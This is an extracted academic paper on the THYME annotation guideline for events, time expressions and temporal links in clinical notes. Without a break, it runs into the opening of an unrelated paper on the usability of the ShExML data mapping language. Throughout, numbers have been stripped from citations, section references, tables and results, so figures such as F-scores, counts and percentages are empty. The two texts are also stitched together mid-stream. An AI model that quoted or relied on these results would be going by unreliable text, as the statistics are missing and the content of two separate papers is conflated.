new clinical subdomain. interpreting ‘event’ and temporal expressions in the clinical domain much prior work has been done on standardizing the annotation of events and temporal expressions in text. the most widely used approach is the iso- timeml specification (pustejovsky et al., ), an iso standard that provides a common framework for annotating and analyzing time, events, and event rela- tions. as defined by iso-timeml, an event refers to anything that can be said “to obtain or hold true, to happen or to occur”. this is a broad notion of event, consistent with bach’s use of the term “eventuality” (bach, ) as well as the notion of fluents in ai (mccarthy, ). because the goals of the thyme project involve automatically identifying the clinical timeline for a patient from clincal records, the scope of what should be admitted into the domain of events is inter- preted more broadly than in iso-timeml . within the thyme-timeml guideline, an event is any- thing relevant to the clinical timeline, i.e., anything that would show up on a detailed timeline of the pa- tient’s care or life. the best single-word syntactic head for the event is then used as its span. for example, a diagnosis would certainly appear on such a timeline, as would a tumor, illness, or procedure. on the other hand, entities that persist throughout the relevant temporal period of the clinical timeline (endurants in ontological circles) would not be con- sidered as event-like. this includes the patient, other humans mentioned (the patient’s mother-in-law or the doctor), organizations (the emergency room), non-anatomical objects (the patient’s car), or indi- vidual parts of the patient’s anatomy (an arm is not an event unless missing or otherwise notable). to meet our explicit goals, the thyme-timeml guideline introduces two additional levels of interpre- our use of the term ‘event’ corresponds with the less specific iso-timeml term ‘eventuality’ tation beyond that specified by iso-timeml: (i) a well-defined task; and (ii) a clearly identified domain. by focusing on the creation of a clinical timeline from clinical narrative, the guideline imposes con- straints that cannot be assumed for a broadly defined and domain independent annotation schema. some events annotated under our guideline are considered meaningful and eventive mostly by virtue of a specific clinical or legal value. for example, ajcc staging codes (discussed in section ) are eventive only in the sense of the code being assigned to a tumor at a given moment in the patient’s care. however, they are of such critical importance and informative value to doctors that we have chosen to annotate them specifically so that they will show up on the patient’s timeline in a clinical setting. similarly, because of legal pressures to establish in- formed consent and patient knowledge of risk, entire paragraphs of clinical notes are dedicated to docu- menting the doctor’s discussion of risks, plans, and alternative strategies. as such, we annotate verbs of discussion (“we talked about the risks of this drug”), consent (“she agreed with the current plan”), and comprehension (“mrs. larsen repeated the potential side effects back to me”), even though they are more relevant to legal defense than medical treatment. it is also because of this grounding in clinical lan- guage that entities and other non-events are often interpreted in terms of their associated eventive prop- erties. there are two major types for which this is a significant shift in semantic interpretation: ( ) a medication as event: orders: lariam twice daily. b disorder as event: tumor of the left lung. in both these cases, entities which are not typically marked as events are identified as such, because they contribute significant information to the clinical time- line being constructed. in ( a), for example, the timex “twice daily” is interpreted as scoping over the eventuality of the patient taking the medication, not the prescription event. in sentence ( b), the “tu- mor” is interpreted as a stative eventuality of the patient having a tumor located within an anatomical region, rather than an entity within an entity. within the medical domain, these eventive inter- pretations of medications, growths and status codes are unambiguous and consistent. doctors in clini- cal notes (unlike in biomedical research texts) do not discuss medications without an associated (im- plicit) administering event (though some mentions may be hypothetical, generic or negated). similarly, mentions of symptoms or disorders reflect occur- rences in a patient’s life, rather than abstract entities. with these interpretations in mind, we can safely in- fer, for instance, that all umls (unified medical language system, (bodenreider, )) entities of the types disorder, chemical/drug, procedure and sign/symptom will be events. in general, in the medical domain, it is essential to read “between the lines” of the shorthand expressions used by the doctors, and recognize implicit events that are being referred to by specific anatomical sites or medications. modifications to iso-timeml for the clinical domain overall, we have found that the specification required for temporal annotation in the clinical domain does not require substantial modification from existing specifications for the general domain. the clinical domain includes no shortage of inferences, short- hands, and unusual use of language, but the structure of the underlying timeline is not unique. as a result of this, we have been able to adopt most of the framework from iso-timeml, adapting the guidelines where needed, as well as reframing the focus of what gets annotated. this is reflected in a comprehensive guideline, incorporating the specific patterns and uses of events and temporal expressions as seen in clinical data. this approach allows the resulting annotations to be interoperable with exist- ing solutions, while still accommodating the major differences in the nature of the texts. our guide- lines, as well as the annotated data, are available at http://thyme.healthnlp.org our extensions of the iso-timeml specification to the clinical domain are intended to address specific constructions, meanings, and phenomena in medical texts. our schema differs from iso-timeml in a few notable ways. event properties we have both simplified the iso-timeml coding of events, and extended it to meet the needs of the clinical domain and the specific language goals of the clinical narrative. access to the corpus will require a data use agreement. more information about this process is available from the corpus website. consider, for example, how modal subordination is handled in iso-timeml. this involves the semantic characterization of an event as “likely”, “possible”, or as presented by observation, evidence, or hearsay. all of these are accounted for compositionally in iso- timeml within the slink (subordinating link) relation (pustejovsky et al., ). while accept- ing iso-timeml’s definition of event modality, we have simplified the annotation task within the cur- rent guideline, so that events now carry attributes for “contextual modality”, “contextual aspect” and “permanence”. contextual modality allows the values actual, hypothetical, hedged, and generic. actual covers events which have actually happened, e.g., “we’ve noted a tumor”. hypothetical covers con- ditionals and possibilities, e.g., “if she develops a tumor”. hedged is for situations where doctors proffer a diagnosis, but do so cautiously, to avoid legal liability for an incorrect diagnosis or for over- looking a correct one. for example: ( ) a. the signal in the mri is not inconsistent with a tumor in the spleen. b. the rash appears to be measles, awaiting antibody test to confirm. these hedged events are more real than a hypo- thetical diagnosis, and likely merit inclusion on a timeline as part of the diagnostic history, but must not be conflated with confirmed fact. these (and other forms of uncertainty in the medical domain) are discussed extensively in (vincze et al., ). in contrast, generic events do not refer to the pa- tient’s illness or treatment, but instead discuss illness or treatment in general (often in the patient’s specific demographic). for example: ( ) in other patients without significant comor- bidity that can tolerate adjuvant chemother- apy, there is a benefit to systemic adjuvant chemotherapy. these sections would be true if pasted into any pa- tient’s note, and are often identical chunks of text repeatedly used to justify a course of action or treat- ment as well as to defend against liability. contextual aspect (to distinguish from grammati- cal aspect), allows the clinically-necessary category, intermittent. this serves to distinguish intermit- tent events (such as vomiting or seizures) from constant, more stative events (such as fever or sore- ness). for example, the bolded event in ( a) would be marked as intermittent, while that in ( b) would not: ( ) a she has been vomiting since june. b she has had swelling since june. in the first case, we assume that her vomiting has been intermittent, i.e., there were several points since june in which she was not actively vomiting. in the second case, unless made otherwise explicit (“she has had occasional swelling”), we assume that swelling was a constant state. this property is also used when a particular instance of an event is intermittent, even though it generally would not be: ( ) since starting her new regime, she has had occa- sional bouts of fever, but is feeling much better. the permanence attribute has two values, finite and permanent. permanence is a property of dis- eases themselves, roughly corresponding to the med- ical concept of “chronic” vs. “acute” disease, which marks whether a disease is persistent following diag- nosis. for example, a (currently) uncurable disease like multiple sclerosis would be classed as perma- nent, and thus, once mentioned in a patient’s note, will be assumed to persist through the end of the patient’s timeline. this is compared with finite disorders like “influenza” or “fever”, which, if not mentioned in subsequent notes, should be considered cured and no longer belongs on the patient’s time- line. because it requires domain-specific knowledge, although present in the specification, permanence is not currently annotated. however, annotators are trained on the basic idea and told about subsequent axiomatic assignment. the addition of this property to our schema is designed to relieve annotators of any feeling of obligation to express this inferred informa- tion in some other way. timex types temporal expressions (timex s) in the clinical domain function the same as in the gen- eral linguistic community, with two notable excep- tions. iso-timeml sets (statements of frequency) occur quite frequently in the medical domain, par- ticularly with regard to medications and treatments. medication sections within notes often contain long lists of medications, each with a particular associated set (“claritin mg twice daily”), and further tempo- ral specification is not uncommon (e.g., “three times per day at meals”, “once a week at bedtime”). the second major change for the medical domain is a new type of timex which we call prepos- texp. this covers temporally complex terms like “preoperative”, “postoperative”, and “intraoperative”. these temporal expressions designate a span of time bordered, usually only on one side, by the incorpo- rated event (an operation, in the previous events). in many cases, the referent is clear: ( ) she underwent hemicolectomy last week, and had some postoperative bleeding. here we understand that “postoperative” refers to “the period of time following the hemicolectomy”. in these cases, the prepostexp makes explicit a tempo- ral link between the bleeding and the hemicolectomy. in other cases, no clear referent is present: ( ) patient shows some post-procedure scarring. in these situations, where no procedure is mentioned (or the reference is never explicitly resolved), we treat the prepostexp as a narrative container (see section ), covering the span of time following the unnamed procedure. finally, it is worth noting that the process of nor- malizing those timex s is significantly more com- plex relative to the general domain, because many temporal expressions are anchored not to dates or times, but to other events (whose dates are often not mentioned or not known by the physician). as we move towards a complete system, we are working to expand the iso-timeml system for timex nor- malization to allow some value to be assigned to a phrase like “in the months after her hemicolectomy” when no referent date is present. iso-timeml, in discussion with iso tc sc , plans to reference to such timex s in a future release of the standard. temporal ordering and narrative containers the semantic content and informational impact of a timeline is encoded in the ordering relations that are identified between the temporal and event expres- sions present in clinical notes. iso-timeml speci- fies the standard thirteen “allen relations” from the interval calculus (allen, ), which it refers to as tlink values. for unguided, general-purpose annota- tion, the number of relations that could be annotated grows quadratically with the number of events and times, and the task quickly becomes unmanageable. there are, however, strategies that we can adopt to make this labeling task more tractable. temporal ordering relations in text are of three kinds: . relations between two events . relations between two times . relations between a time and an event. iso-timeml, as a formal specification of the tem- poral information conveyed in language, makes no distinction between these ordering types. humans, however, do make distinctions, based on local tempo- ral markers and the discourse relations established in a narrative (miltsakaki et al., ; poesio, ). because of the difficulty of humans capturing ev- ery relationship present in the note (and the disagree- ment which arises when annotators attempt to do so), it is vital that the annotation guidelines describe an approach that reduces the number of relations that must be considered, but still results in maximally in- formative temporal links. we have found that many of the weaknesses in prior annotation approaches stem from interaction between two competing goals: • the guideline should specify certain types of an- notations that should be performed; • the guideline should not force annotations to be performed when they need not be. failing in the first goal will result in under-annotation and the neglect of relations which provide necessary information for inference and analysis. failure in the second goal results in over-annotation, creating com- plex webs of temporal relations which yield mostly inferable information, but which complicate annota- tion and adjudication considerably. our method of addressing both goals in tempo- ral relations annotation is that of the narrative con- tainer, discussed in pustejovsky and stubbs ( ). a narrative container can be thought of as a temporal bucket into which an event or series of events may fall, or a natural cluster of events around a given time or situation. these narrative containers are often represented (or “anchored”) by dates or other temporal expressions (within which a variety of different events occur), although they can also be anchored to more abstract concepts (“recovery” which might involve a variety of events) or even durative events (many other events can occur dur- ing a surgery). rather than marking every possible tlink between each event, we instead try to link all events to their narrative containers, and then link those containers so that the contained events can be linked by inference. first, annotators assign each event to one of four broad narrative containers: before the doctime, be- fore and overlapping the doctime, just overlapping the doctime or after the doctime. this narrative container is identified by the event attribute doc- timerel. after the assignment of doctimerel, the remainder of the narrative container relations must be specified using temporal links (tlinks). there are five different temporal relations used for such tlinks: before, overlap, begins-on, ends-on and contains . due to our narrative container ap- proach, contains is the most frequent relation by a large margin. events serving as narrative container anchors are not tagged as containers per-se. instead, annotators use the narrative container idea to help them visu- alize the temporal relations within a document, and then make a series of contains tlink annotations which establish events and timex s as anchors, and specify their contents. if the annotators do their jobs correctly, properly implementing doctimerel and creating accurate tlinks, a good understanding of the narrative containers present in a document will naturally emerge from the annotated text. the major advantage introduced with narrative containers is this: a narrative event is placed within a bounding temporal interval which is explicitly men- tioned in the text. this allows events within sep- arate containers to be linked by post-hoc inference, temporal reasoning, and domain knowledge, rather than by explicit (and time-consuming) one-by-one temporal relations annotation. a secondary advantage is that this approach works nicely with the general structure of story-telling in both the general and clinical domains, and provides a compelling and useful metaphor for interpreting time- lines. often, especially in clinical histories, doctors will cluster discussions of symptoms, interventions and diagnoses around a given date (e.g. a whole para- graph starting “june :”), a specific hospitaliza- tion (“during her january stay at mercy”), or a given illness or treatment (“while she underwent chemo”). even when specific events are not explicitly or- dered within a cluster (often because the order can be easily inferred with domain knowledge), it is often quite easy to place the events into containers, and just a few tlinks can order the containers relative to one another with enough detail to create a clinically useful understanding of the overall timeline. narrative containers also allow the inference of re- lations between sub-events within nested containers: this is a subset of the iso-timeml tlink types, excluding those seldom occurring in medical records, like ‘simultaneous’ as well as inverse relations like ‘during’ or ‘after’. ( ) december th: the patient underwent an mri and ekg as well as emergency surgery. dur- ing the surgery, the patient experienced mild tachycardia, and she also bled significantly during the initial incision. . december th contains mri . december th contains ekg . december th contains surgery a. surgery contains tachycardia b. surgery contains incision c. incision contains bled through our container nesting, we can automatically infer that ‘bled’ occurred on december th (because ‘ th’ contains ‘surgery’ which contains ‘inci- sion’ which contains ‘bled’). this also allows the capture of event/sub-event relations, and the rapid expression of complex temporal interactions. explicit vs. inferable annotation given a specification language, there are essentially two ways of introducing the elements into the docu- ment (data source) being annotated: • manual annotation: elements are introduced into the document directly by the human annotator fol- lowing the guideline. • automatic (inferred) annotation: elements are cre- ated by applying an automated procedure that in- troduces new elements that are derivable from the human annotations. as such, there is a complex interaction between spec- ification and guideline, and we focus on how the clinical annotation task has helped shape and refine the annotation guidelines. it is important to note that an annotation guideline does not necessarily force the markup of certain elements in a text, even though the specification language (and the eventual goal of the project) might require those annotations to exist. in some cases, these added annotations are derived logically from human annotations. explicitly marked temporal relations can be used to infer others that are not marked but exist implicitly through closure. for instance, given events a, b and c and tlinks ‘a before b’ and ‘b before c’, the tlink ‘a be- fore c’ can be automatically inferred. repeatedly applying such inference rules allows all inferable we ignore the application of automatic techniques, such as classifiers trained on external datasets, as our focus here is on the preparation of the gold standard used for such classifiers. tlinks to be generated (verhagen, ). we can use this idea of closure to show our annotators which annotations need not be marked explicitly, saving time and effort. we have also incorporated these clo- sure rules into our inter-annotator agreement (iaa) calculation for temporal relations, described further in section . . the automatic application of rules following the annotation of the text is not limited to the marking of logically inferable relations or events. in the clinical domain, the combination of within-group shared knowledge and pressure towards concise writ- ing leads to a number of common, inferred relations. take, for example, the sentence: ( ) jan : colonoscopy, biopsies. pathology showed adenocarcinoma, resected at mercy. diagnosis t n adenocarcinoma. in this sentence, only the contains relations be- tween “jan ” and the events (in bold) are explicitly stated. however, based on the known progression-of-care for colon cancer, we can infer that the colonoscopy occurs first, biopsies occur dur- ing the colonoscopy, pathology happens afterwards, a diagnosis (here, adenocarcinoma) is returned after pathology, and resection of the tumor occurs after diagnosis. the presence of the ajcc staging infor- mation in the final sentence (along with the confir- mation of the adenocarcinoma diagnosis) implies a post-surgical pathology exam of the resected spec- imen, as the ajcc staging information cannot be determined without this additional examination. these inferences come naturally to domain ex- perts but are largely inaccessible to people outside the medical community without considerable anno- tator training. making explicit our understanding of these “understood orderings” is crucial; although they are not marked by human annotators in our schema, the annotators often found it initially frustrating to leave these (purely inferential) relations unstated. al- though many of our (primarily linguistically trained) annotators learned to see these patterns, we chose to exclude them from the manual task since newer an- notators with varying degrees of domain knowledge may struggle if asked to manually annotate them. similar unspoken-but-understood orderings are found throughout the clinical domain. as mentioned in section , both permanence and contextual as- pect:intermittent are properties of symptoms and dis- eases themselves, rather than of the patient’s particu- lar situation. as such, these properties could easily annotation type raw count event , timex , link total , table : raw frequency of annotation types tlink type raw count % of tlinks contains , . % overlap , . % before , . % begins-on . % ends-on . % total , . % table : relative frequency of tlink types be identified and marked across a medical ontology, and then be automatically assigned to events rec- ognized as specific medical named entities. finally, due to the peculiarities of ehr systems, some annotations must be done programatically. ex- act dates of patient visit (or of pathology/radiology consult) are often recorded as metadata on the ehr itself, rather than within the text, making the canoni- cal doctime (or time of automatic section modifi- cations) difficult to access in de-identified plaintext data, but easy to find automatically. results we report results on the annotations from the here- released subset of the thyme colon cancer corpus, which includes clinical notes and pathology reports for patients diagnosed with colon cancer for a total of documents. each note was annotated by a pair of graduate or undergraduate students in linguistics at the university of colorado, then adju- dicated by a domain expert. these clinical narratives were sampled from the ehrs of a major healthcare center (the mayo clinic). they were deidentified for all patient-sensitive information; however, original dates were retained. . descriptive statistics table presents the raw counts for events, temporal expressions and links in the adjudicated gold anno- tations. table presents the number and percentage of tlinks by type in the adjudicated relations gold annotations. annotation type f -score alpha event . . timex . . link: participants only . . link: participants+type . . link: contains . . table : iaa (f -score and alpha) by annotation type event property f -score alpha doctimerel . . cont.aspect . . cont.modality . . table : iaa (f -score and alpha) for event properties . inter-annotator agreement we report inter-annotator agreement (iaa) results on the thyme corpus. each note was annotated by two independent annotators. the final gold standard was produced after disagreement adjudication by a third annotator was performed. we computed the iaa as f -score and krippen- dorff’s alpha (krippendorff, ) by applying clo- sure, using explicitly marked temporal relations to identify others that are not marked but exist implicitly. in the computation of the iaa, inferred-only tlinks do not contribute to the score, matched or unmatched. for instance, if both annotators mark a before b and b before c, to prevent artificially inflating the agreement score, the inferred a before c is ignored. likewise, if one annotator marked a before b and b before c and the other annotator did not, the inferred a before c is not counted. however, if one annotator did explicitly mark a before c, then an equivalent inferred tlink would be used to match it. event and timex iaa was generated based on exact and overlapping spans, respectively. these results are reported in table . the thyme corpus also differs from iso- timeml in terms of event properties, with the addition of doctimerel, contextualmodality and contextualaspect. iaa for these properties is in table . . baseline systems to get an idea of how much work will be neces- sary to adapt existing temporal information extrac- tion systems to the clinical domain, we took the freely available cleartk-timeml system (bethard, ), tempeval thyme corpus p r f p r f timex . . . . . . event . . . . . . doctimerel - - - . . . link . . . . . . event-timex - - - . . . event-event - - - . . . table : performance of cleartk-timeml models, as reported in the tempeval competition, and as applied to the thyme corpus development set. which was among the top performing systems in tempeval (uzzaman et al., ), and eval- uated its performance on the thyme corpus. cleartk-timeml uses support vector machine classifiers trained on the tempeval training data, employing a small set of features including character patterns, tokens, stems, part-of-speech tags, nearby nodes in the constituency tree, and a small time word gazetteer. for events and timex s, the cleartk-timeml system could be applied di- rectly to the thyme corpus. for doctimerels, the relation for an event was taken from the tlink between that event and the document creation time, after mapping includes to overlap. events with no such tlink were assumed to have a doc- timerel of overlap. for other temporal relations, includes was mapped to contains. results of this system on tempeval and the thyme corpus are shown in table . for time ex- pressions, performance when moving to the clinical data degrades about %, from f of . to . . for events, the degradation is much larger, about %, from . to . , most likely because of the large number of clinical symptoms, diseases, disor- ders, etc. which have never been observed by the system during training. temporal relations are a bit more difficult to compare because tempeval lumped doctimerel and other temporal relations together and had several differences in their evaluation met- ric . however, we at least can see that performance of the cleartk-timeml system on temporal rela- tions is low on clinical text, achieving only f of . . these results suggest that clinical narratives do the tempeval evaluation metric penalized systems for parts of the text that were not examined by annotators, and used different variants of closure-based precision and recall. indeed present new challenges for temporal informa- tion extraction systems, and that having access to domain specific training data will be crucial for ac- curate extraction in the clinical domain. at the same time, it is encouraging that we were able to apply existing iso-timeml-based systems to our corpus, despite the several extensions to iso-timeml that were necessary for clinical narratives. discussion contains plays a large role in the thyme cor- pus, representing % of tlink annotations made, compared with only . % for overlap, the second most frequent type. we also see that before links are relatively less common than overlap and con- tains, illustrating that much of the temporal ordering on the timeline is accomplished by using many ver- tical links (contains, overlap) to build contain- ers, and few horizontal links (before, begins-on, ends-on) to order them. iaa on events and temporal expressions is strong, although differentiating implicit events (which should not be marked) from explicit, mark- able events remains one of the biggest sources of disagreement. when compared to the data from the i b challenge (sun et al., b), our iaa figures are quite similar. even with our more com- plex schema, we achieved an f -score of . for events (compared to the i b score of . for par- tial match). for timex s, our f -score was . , compared to an f -score of . for i b . tlinking medical events remains a very diffi- cult task. by using our narrative container approach to constrain the number of necessary annotations and by eliminating often-confusing inverse relations (like ‘after’ and ‘during’) (neither of which were done for the i b data), we were able to significantly improve on the i b tlink span agreement f -score of . , achieving an agreement score of . for all links across our corpus. the majority of remaining an- notator disagreement comes from different opinions about whether any two events require an explicit tlink between them or an inferred one, rather than what type of tlink it would be (e.g. before vs. contains). although our results are still signifi- cantly higher than the results reported for i b , and in line with previously reported general news figures, we are not satisfied. improving iaa is an important goal for future work, and with further training, speci- fication, experience, and standardization, we hope to clarify contexts for explicit tlinks. news-trained temporal information extraction sys- tems see a significant drop in performance when ap- plied to the clinical texts of the thyme corpus. but as the corpus is an extension of iso-timeml, future work will be able to train iso-timeml compliant systems on the annotations of the thyme corpus to reduce or eliminate this performance gap. some applications that our work may enable in- clude ( ) better understanding of event semantics, such as whether a disease is chronic or acute and its usual natural history, ( ) typical event duration for these events, ( ) the interaction of general and domain-specific events and their importance in the fi- nal timeline, and, more generally, ( ) the importance of rough temporality and narrative containers as a step towards finer-grained timelines. we have several avenues of ongoing and future work. first, we are working to demonstrate the utility of the thyme corpus for training machine learning models. we have designed support vector machine models with constituency tree kernels that were able to reach an f -score of . on an event-timex narrative container identification task (miller et al., ), and we are working on training models to identify events, times and the remaining types of temporal relations. second, as per our motivating use cases, we are working to integrate this annotation data with timeline visualization tools and to use these annotations in quality-of-care research. for example, we are using temporal reasoning built on this work to investigate the liver toxicity of methotrexate across a large corpus of ehrs (lin et al., under review)]. finally, we plan to explore the application of our notion of an event (anything that should be visible on a domain-appropriate timeline) to other domains. it should transfer naturally to clinical notes about other (non-cancer) conditions, and even to other types of clinical notes, as certain basic events should always be included in a patient’s timeline. applying our notion of event to more distant domains, such as legal opinions, would require first identifying a consensus within the domain about which events must appear on a timeline. conclusion much of the information in clinical notes critical to the construction of a detailed timeline is left implicit by the concise shorthand used by doctors. many events are referred to only by a term such as “tu- mor”, while properties of the event itself, such as “intermittent”, may not be specified. in addition, the ordering of events on a timeline is often left to the reader to infer, based on domain-specific knowledge. it is incumbent upon the annotation guideline to in- dicate that only informative event orderings should be annotated, while leaving domain-specific order- ings to post-annotation inference. this document has detailed our approach to adapting the existing iso-timeml standard to this recovery of implicit information, and defining guidelines that support an- notation within this complex domain. our guide- lines, as well as the annotated data, are available at http://thyme.healthnlp.org, and the full corpus has been proposed for use in a semeval shared task. acknowledgments the project described is supported by grant num- ber r lm and u lm from the na- tional library of medicine. the content is solely the responsibility of the authors and does not necessarily represent the official views of the national library of medicine or the national institutes of health. we would also like to thank dr. piet c. de groen and dr. brad erickson at the mayo clinic, as well as dr. william f. styler iii, for their contributions to the schema and to our understanding of the intricacies of clinical language. references james f allen. . maintaining knowledge about temporal intervals. communications of the acm, ( ): – . emmon bach. . the algebra of events. linguistics and philosophy, ( ): – . steven bethard. . cleartk-timeml: a minimalist ap- proach to tempeval . in second joint conference on lexical and computational semantics (*sem), vol- ume : proceedings of the seventh international work- shop on semantic evaluation (semeval ), pages – , atlanta, georgia, usa, june. association for computational linguistics. olivier bodenreider. . the unified medical language system (umls): integrating biomedical terminology. nucleic acids research, (database issue):d –d , january. philip bramsen, pawan deshpande, yoong keok lee, and regina barzilay. . finding temporal order in discharge summaries. in amia annual symposium proceedings, volume , page . american medical informatics association. carlo combi, yuval shahar, et al. . temporal reason- ing and temporal data maintenance in medicine: issues and challenges. computers in biology and medicine, ( ): – . robert h dolin. . modeling the temporal complex- ities of symptoms. journal of the american medical informatics association, ( ): – . george hripcsak, nicholas d soulakis, li li, frances p morrison, albert m lai, carol friedman, neil s cal- man, and farzad mostashari. . syndromic surveil- lance using ambulatory electronic health records. jour- nal of the american medical informatics association, ( ): – . ann k irvine, stephanie w haas, and tessa sullivan. . tn-ties: a system for extracting temporal infor- mation from emergency department triage notes. in amia annual symposium proceedings, volume , page . american medical informatics association. elpida t keravnou. . temporal abstraction of med- ical data: deriving periodicity. in intelligent data analysis in medicine and pharmacology, pages – . springer. klaus h. krippendorff. . content analysis: an introduction to its methodology. sage publications, inc, third edition edition, april. chen lin, elizabeth karlson, dmitriy dligach, mon- ica ramirez, timothy miller, huan mo, natalie braggs, andrew cagan, joshua denny, and guer- gana. savova. under review. automatic identification of methotrexade-induced liver toxicity in rheumatoid arthritis patients from the electronic medical records. journal of the medical informatics association. john mccarthy. . actions and other events in sit- uation calculus. in proceedings of the international conference on principles of knowledge representation and reasoning, pages – . morgan kaufmann publishers; . stéphane m meystre, guergana k savova, karin c kipper- schuler, john f hurdle, et al. . extracting infor- mation from textual documents in the electronic health record: a review of recent research. yearb med inform, : – . timothy miller, steven bethard, dmitriy dligach, sameer pradhan, chen lin, and guergana savova. . dis- covering temporal narrative containers in clinical text. in proceedings of the workshop on biomedical natural langua ge processing, pages – , sofia, bulgaria, august. association for computational lin- guistics. eleni miltsakaki, rashmi prasad, aravind joshi, and bon- nie webber. . the penn discourse treebank. in in proceedings of lrec . massimo poesio. . discourse annotation and seman- tic annotation in the gnome corpus. in in proceedings of the acl workshop on discourse annotation. james pustejovsky and amber stubbs. . increasing informativeness in temporal annotation. in proceedings of the th linguistic annotation workshop, pages – . association for computational linguistics. james pustejovsky, robert knippen, jessica littman, and roser sauri. . temporal and event information in natural language text. language resources and evalu- ation, ( - ): – . james pustejovsky, kiyong lee, harry bunt, and laurent romary. . iso-timeml: an international standard for semantic annotation. in proceedings of the seventh international conference on language resources and evaluation (lrec ), valletta, malta. angus roberts, robert gaizauskas, mark hepple, george demetriou, yikun guo, and ian roberts. . build- ing a semantically annotated corpus of clinical texts. journal of biomedical informatics, ( ): – . guergana savova, steven bethard, will styler, james mar- tin, martha palmer, james masanz, and wayne ward. . towards temporal relation discovery from the clinical narrative. in amia annual symposium pro- ceedings, volume , page . american medical informatics association. tessa sullivan, ann irvine, and stephanie w haas. . it’s all relative: usage of relative temporal expressions in triage notes. proceedings of the american society for information science and technology, ( ): – . weiyi sun, anna rumshisky, and ozlem uzuner. a. evaluating temporal relations in clinical text: i b challenge. journal of the american medical informat- ics association. weiyi sun, anna rumshisky, and ozlem uzuner. b. evaluating temporal relations in clinical text: i b challenge. journal of the american medical informat- ics association, ( ): – . alexander turchin, maria shubina, eugene breydo, merri l pendergrass, and jonathan s einbinder. . comparison of information content of structured and narrative text data sources on the example of medica- tion intensification. journal of the american medical informatics association, ( ): – . naushad uzzaman, hector llorens, leon derczynski, james allen, marc verhagen, and james pustejovsky. . semeval- task : tempeval- : evaluating time expressions, events, and temporal relations. in sec- ond joint conference on lexical and computational semantics (*sem), volume : proceedings of the sev- enth international workshop on semantic evaluation (semeval ), pages – , atlanta, georgia, usa, june. association for computational linguistics. marc verhagen. . temporal closure in an annota- tion environment. language resources and evalua- tion, ( ): – . veronika vincze, gyrgy szarvas, richrd farkas, gyrgy mra, and jnos csirik. . the bioscope corpus: biomedical texts annotated for uncertainty, negation and their scopes. bmc bioinformatics, (suppl ): – . ying zhao, george karypis, and usama m. fayyad. . hierarchical clustering algorithms for docu- ment datasets. data mining and knowledge discovery, : – . jiaping zheng, wendy w chapman, rebecca s crowley, and guergana k savova. . coreference resolution: a review of general methodologies and applications in the clinical domain. journal of biomedical informatics, ( ): – . li zhou, simon parsons, and george hripcsak. . the evaluation of a temporal reasoning system in processing clinical discharge summaries. journal of the american medical informatics association, ( ): – . submitted may accepted october published november corresponding author herminio garcía-gonzález, garciaher- minio@uniovi.es academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright garcía-gonzález et al. distributed under creative commons cc-by . open access shexml: improving the usability of heterogeneous data mapping languages for first-time users herminio garcía-gonzález , iovka boneva , sławek staworko , josé emilio labra-gayo and juan manuel cueva lovelle deparment of computer science, university of oviedo, oviedo, asturias, spain university of lille, inria, lille, nord-pas-de-calais, france abstract integration of heterogeneous data sources in a single representation is an active field with many different tools and techniques. in the case of text-based approaches— those that base the definition of the mappings and the integration on a dsl—there is a lack of usability studies. in this work we have conducted a usability experiment (n= ) on three different languages: shexml (our own language), yarrrml and sparql-generate. results show that shexml users tend to perform better than those of yarrrml and sparql-generate. this study sheds light on usability aspects of these languages design and remarks some aspects of improvement. subjects human-computer interaction, artificial intelligence, world wide web and web science, programming languages keywords data integration, data mapping, shexml, yarrrml, usability, sparql-generate introduction data integration is the problem of mapping data from different sources so that they can be used through a single interface (halevy, ). in particular, data exchange is the process of transforming source data to a target data model, so that it can be integrated in existing applications (fagin et al., ). modern data exchange solutions require from the user to define a mapping from the source data model to the target data model, which is then used by the system to perform the actual data transformation. this process is crucial to many applications nowadays as the number of heterogeneous data sources is growing (reinsel, gantz & rydning, ). although many technologies have appeared through the years, the emergence of the semantic web (berners-lee, hendler & lassila, ) offered new perspectives for data integration. the semantic web principle recommends to represent entities through a unique internationalized resource identifier (iri) which allows creation of implicit links between distinct datasets simply by reusing existing iris. moreover, the resource description framework (rdf), which is the advocated data format for the semantic web, is compositional, meaning that one can simply fuse data sources without the use of a specific merger. these characteristics make rdf a privileged format for data integration and thus a target for data exchange and transformation. how to cite this article garcía-gonzález h, boneva i, staworko s, labra-gayo je, cueva lovelle jm. . shexml: improving the us- ability of heterogeneous data mapping languages for first-time users. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:garciaherminio@uniovi.es mailto:garciaherminio@uniovi.es https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. see https://data.bnf.fr/en/about for more information on the project. the most notable example of an rdf based data integration system is wikidata (https://www.wikidata.org/) where multiple contributors—humans or robots—transform data from different sources and integrate it to the wikidata data store. another example is the data.bnf.fr project that exposes in rdf format the catalog of the french national library (bnf) by interlinking it with other datasets around the world. initially, the only way to perform these data transformations was to use ad-hoc scripts designed to take one data source and transform it to an rdf output. this supposed the creation of a dedicated script for every new input data source that needed to be converted. such solutions are slow and costly to develop. later on, domain specific language (dsl) approaches emerged which are able to define a translation in a declarative fashion instead of an imperative one. this technique lowers the development time, but a script for every different data source is still needed, which can be a maintenance issue. more recent systems allow direct transformation of multiple data sources into a single representation. some of them provide dedicated dsls in which a single script defines the multi-source transformation, others provide graphical interfaces. this is an improvement compared to previous techniques as in principle it allows for faster development and improved maintainability (meester et al., ). however, the adoption of such systems depends also on their usability (hanenberg, ). with usability in mind we have designed the shexml (garcía-gonzález, fernández- Álvarez & gayo, ) language that allows transformation and integration of data from xml and json sources in a single rdf output. shexml uses shape expressions (shex) (prud’hommeaux, labra gayo & solbrig, ) for defining the desired structure of the output. shexml has text based syntax (in contrast to graphical tools) and is intended for users that prefer this kind of representation. our hypothesis is that for first-time users with some programming and linked data background, data integration is performed more easily using shexml than using one of the existing alternatives. the consequent research questions that we study in the current paper are: • rq : is shexml more usable for first-time users over other languages? • rq : if true, can a relation be established between features support and usability for first-time users? • rq : which parts of shexml—and of other languages—can be improved to increase usability? in the case of this work we are going to focus on usability of tools based on a dsl and see how the design of the language can have an effect on usability and associated measures such as: development time, learning curve, etc. the rest of the paper is structured as follows: ‘background’ studies the related work, in ‘presentation of the languages under study’ the three languages are compared alongside a features comparison between them, in ‘methodology’ we describe the methodology followed in the study, in ‘results’ the results are presented along with their statistical analysis. in ‘discussion’ we discuss and interpret the results and in ‘conclusions and future work’ we draw some conclusions and propose some future lines from this work. garcía-gonzález et al. ( ), peerj comput. sci., doi 